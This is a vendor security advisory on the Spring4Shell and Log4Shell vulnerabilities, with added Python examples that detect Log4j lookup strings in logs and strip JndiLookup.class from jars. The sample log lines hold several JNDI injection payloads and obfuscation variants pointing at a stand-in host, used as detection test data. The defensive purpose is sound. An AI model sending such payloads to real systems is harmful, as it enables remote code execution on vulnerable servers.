Fortra Infrastructure Protection brands Digital Defense and Beyond Security are actively monitoring the disclosure of a security issue in the widely used Java Spring Framework, known as "Spring4Shell" or "SpringShell" and assigned CVE-2022-22965.
The Spring Framework lets Java developers build enterprise-grade Java applications with less effort. A Remote Code Execution (RCE) vulnerability disclosed in the Spring Framework allows an unauthenticated attacker to write a web shell onto a vulnerable server and execute code on it remotely.
Spring Framework versions 5.3.0 through 5.3.17, 5.2.0 through 5.2.19, and older unsupported versions are vulnerable when running on JDK 9 or later. The publicly reported exploit additionally requires the application to be deployed as a WAR on Apache Tomcat and to use spring-webmvc or spring-webflux; the underlying weakness is more general, so other deployment configurations should not be assumed safe.
Patch information is available from the Spring project; the fix is included in Spring Framework 5.3.18 and 5.2.20.
The Vulnerability Research Team has updated our scanner with check 148151.
Should you have questions regarding this advisory or require assistance: Frontline.Cloud subscribers can contact their Client Advocate or Personal Security Analyst; beSECURE users can contact Beyond Security Support via Freshdesk.
—Fortra Infrastructure Protection Vulnerability Research
Beyond Security by Fortra is aware of a recently disclosed security issue related to the open-source Apache “Log4j2” utility (CVE-2021-44228).
Log4j is a logging library used in Java software. The flaw is that the Java Naming and Directory Interface (JNDI) features Log4j uses in configuration, log messages and parameters do not protect against attacker-controlled LDAP servers and other JNDI-related endpoints. A remote attacker who can control log messages or log message parameters can run arbitrary code loaded from an LDAP server on any application that logs with Log4j while message lookup substitution is enabled.
The flaw affects all versions of Log4j from 2.0-beta9 to 2.14.1.
This flaw is actively being exploited.
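Detection of exploitation attempts in web and application logs, as an added example that is not part of the original advisory or of Fortra/Beyond Security tooling: the Python below normalises the nested-lookup and URL-encoding obfuscations attackers wrap around the ${jndi:...} string and reports the scheme and target of each hit. The access-log lines are constructed for the example, and the function names (normalise, find_jndi, scan_lines) are the example's own.

```python
"""Spot CVE-2021-44228 lookup strings in web/application logs.

Added example (not Fortra or Beyond Security code). Log4j 2.x expands
${...} lookups found in logged data, so an exploitation attempt shows up as
a ${jndi:<scheme>:...} string in any field an attacker controls, most often
the User-Agent or a query parameter. Attackers hide the keyword inside nested
lookups (${lower:j}, ${::-j}, ${env:NaN:-j}) and URL-encode it; this code
unwraps those forms before matching.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# innermost lookup: a ${...} whose body contains no further ${
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# what a resolved payload looks like: ${jndi:<scheme>:[//]<target>
JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^}\s]*)")


def _resolve(body: str) -> Optional[str]:
    """Text Log4j would substitute for a nested lookup body, or None when the
    lookup is not one of the obfuscation forms we unwrap."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None                      # the payload itself; keep it
    if ":-" in body:                     # ${x:-default}, ${::-j}, ${env:NaN:-j}
        return body.rsplit(":-", 1)[1]
    for prefix in ("lower:", "upper:"):  # ${lower:j}, ${upper:J}
        if low.startswith(prefix):
            return body[len(prefix):]
    return None


def normalise(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups inside-out until stable."""
    text = unquote(unquote(text))        # single and double encoding
    for _ in range(max_rounds):          # bounded: pathological nesting stops here
        changed = False

        def repl(m):
            nonlocal changed
            val = _resolve(m.group(1))
            if val is None:
                return m.group(0)
            changed = True
            return val

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text.lower()


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """(scheme, target) for the first JNDI lookup in line, else None."""
    m = JNDI.search(normalise(line))
    return (m.group(1), m.group(2)) if m else None


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(line number, scheme, target) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = find_jndi(line)
        if hit:
            hits.append((n, *hit))
    return hits


# Constructed sample access-log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:21:14:03 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:21:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:21:15:41 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.9/x}"',
    '198.51.100.9 - - [10/Dec/2021:21:16:02 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fz%7D HTTP/1.1" 200 612 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Dec/2021:21:16:30 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/y}"',
    '198.51.100.10 - - [10/Dec/2021:21:17:00 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NaN:-j}ndi:dns://203.0.113.9/q}"',
]

if __name__ == "__main__":
    for n, scheme, target in scan_lines(SAMPLE_LOG):
        print(f"line {n}: jndi {scheme} -> {target}")
```

Run over the constructed lines it reports five hits (lines 2 to 6) and ignores the plain browser request. The unwrapping deliberately covers only the default-value, lower and upper forms; a hit on a partially unwrapped string is still a hit, and anything that still contains "${" after normalisation is worth a manual look, because legitimate requests rarely carry Log4j lookup syntax at all.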
We strongly encourage customers who manage environments containing Log4j2 to update to the latest version released by the Apache Software Foundation, which addresses the issue. It is available at https://logging.apache.org/log4j/2.x/download.html or through the operating system's software update mechanism.
If updating the software is not an option, the Foundation has also shared mitigations that protect against remote code execution via the vulnerability: for Log4j versions 2.10 and later, set the system property log4j2.formatMsgNoLookups (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS) to true; for any 2.x version, remove the JndiLookup class from the classpath, for example with zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class, and restart the JVM. Apache subsequently found the formatMsgNoLookups setting alone to be insufficient and recommends upgrading or removing the class.
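An added example, not Fortra or Beyond Security code and not Apache's own tooling, of the inventory step that precedes either mitigation and of the class-removal mitigation itself: a Python scanner that locates log4j-core archives on disk, including jars nested inside WAR files, reports their manifest version and whether JndiLookup.class is present, and rewrites a top-level jar without that class. The jars it builds are constructed stand-ins with four-byte class stubs, not real Log4j, and the function names are the example's own.

```python
"""Find log4j-core archives and strip JndiLookup.class (CVE-2021-44228).

Added example (not Fortra or Beyond Security tooling). Walks a directory
tree, opens every jar/war/ear, follows archives nested inside archives, and
reports each log4j-core it finds with its Implementation-Version (taken from
MANIFEST.MF when present) and whether the JNDI lookup class is still there.
strip_jndi_lookup() rewrites a top-level jar without that class, which is the
class-removal mitigation Apache documents for installs that cannot upgrade.
"""
import io
import os
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    path: str       # filesystem path; "!" separates nested archive members
    version: str    # Implementation-Version from the manifest, or "unknown"
    has_jndi: bool  # JndiLookup.class present


def _manifest_version(zf: zipfile.ZipFile) -> str:
    if "META-INF/MANIFEST.MF" not in zf.namelist():
        return "unknown"
    for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return "unknown"


def _scan_zip(zf: zipfile.ZipFile, label: str, out: List[Finding]) -> None:
    names = set(zf.namelist())
    if any(n.startswith(CORE_PREFIX) for n in names):
        out.append(Finding(label, _manifest_version(zf), JNDI_CLASS in names))
    for n in sorted(names):                    # recurse into nested archives
        if n.lower().endswith(ARCHIVE_EXT):
            blob = io.BytesIO(zf.read(n))      # nested archives are read into memory
            if zipfile.is_zipfile(blob):
                with zipfile.ZipFile(blob) as inner:
                    _scan_zip(inner, f"{label}!{n}", out)


def scan_path(root: str) -> List[Finding]:
    out: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            p = os.path.join(dirpath, f)
            if f.lower().endswith(ARCHIVE_EXT) and zipfile.is_zipfile(p):
                with zipfile.ZipFile(p) as zf:
                    _scan_zip(zf, p, out)
    return out


def strip_jndi_lookup(jar_path: str) -> bool:
    """Rewrite jar_path without JndiLookup.class. Returns False if absent."""
    buf = io.BytesIO()
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        with zipfile.ZipFile(buf, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_CLASS:
                    dst.writestr(info, src.read(info))   # keeps per-entry compression
    with open(jar_path, "wb") as fh:           # replace only once the copy is complete
        fh.write(buf.getvalue())
    return True


def build_sample_tree(root: str) -> None:
    """Constructed stand-in jars (four-byte class stubs), not real Log4j."""
    def log4j_core(version: str, with_jndi: bool) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            zf.writestr(CORE_PREFIX + "Logger.class", b"\xca\xfe\xba\xbe")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        return buf.getvalue()

    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(log4j_core("2.14.1", True))
    war = io.BytesIO()                         # a WAR bundling its own copy
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", log4j_core("2.14.1", True))
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(war.getvalue())


def demo(root=None):
    """Build the sample tree, scan, strip the top-level jar, scan again."""
    root = root or tempfile.mkdtemp(prefix="log4j-demo-")
    build_sample_tree(root)
    before = scan_path(root)
    removed = strip_jndi_lookup(os.path.join(root, "lib", "log4j-core-2.14.1.jar"))
    return before, removed, scan_path(root)


if __name__ == "__main__":
    before, removed, after = demo()
    for f in before + after:
        print(f"{f.path}: log4j-core {f.version}, JndiLookup present={f.has_jndi}")
```

The second scan in demo() is the point: after stripping the top-level jar, the copy nested inside app.war still reports JndiLookup present, which is exactly the case a file-name or manifest-only check misses. A nested jar has to be repacked into its WAR rather than edited in place, the JVM must be restarted after the change, and the directory should be rescanned before the host is marked mitigated.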
Beyond Security uses Log4j in the beSECURE LSS scanners and beSECURE II scanner and management bundle.
The beSECURE LSS uses Java to schedule and run scans and to send results back to the local or cloud management server.
An attacker would need access to the local or cloud LSS to inject the required payload.
Currently, Beyond Security is not aware of a means for a remote attacker to access the necessary resources to initiate an attack.
Affected cloud versions of the LSS have been patched.
Beyond Security has released a new LSS base image that does not include the JNDI class. New deployments of LSS and beSECURE II will not contain the vulnerable JNDI class.
Beyond Security is working on an update that will remove the JNDI class from existing LSS scanners as an additional precaution, even though the vulnerable code is not reachable (as noted above).
The beSECURE UI is not affected.
If you have any questions about this flaw or need assistance updating your LSS, please contact Beyond Security Support.